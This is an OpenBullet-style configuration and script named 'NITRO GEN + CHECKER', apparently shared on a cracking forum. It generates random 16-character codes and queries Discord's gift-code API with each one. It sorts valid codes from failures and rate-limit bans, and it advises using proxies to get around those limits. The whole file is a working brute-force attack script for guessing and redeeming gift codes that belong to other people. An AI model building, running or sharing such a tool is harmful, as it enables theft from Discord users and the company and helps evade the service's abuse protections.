[SETTINGS]
{
  "Name": "NITRO GEN + CHECKER",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2020-02-20T03:14:14.845254-05:00",
  "AdditionalInfo": "Use proxies",
  "Author": "SLAYA ON C.TO",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION RandomString "?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i" -> CAP "CODE" 

REQUEST GET "https://discordapp.com/api/v6/entitlements/gift-codes/<CODE>?with_application=true&with_subscription_plan=true" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success AND 
    KEY "<SOURCE>" DoesNotContain "Unknown Gift Code" 
    KEY "<SOURCE>" DoesNotContain "You are being rate limited." 
    KEY "<SOURCE>" DoesNotContain "The request / response that are contrary to the secure web gateway security policies have been blocked." 
    KEY "<SOURCE>" DoesNotContain "Enter ThreatPulse Proxy Credentials" 
  KEYCHAIN Failure OR 
    KEY "Unknown Gift Code" 
  KEYCHAIN Ban OR 
    KEY "You are being rate limited." 
    KEY "The request / response that are contrary to the secure web gateway security policies have been blocked." 
    KEY "Enter ThreatPulse Proxy Credentials" 

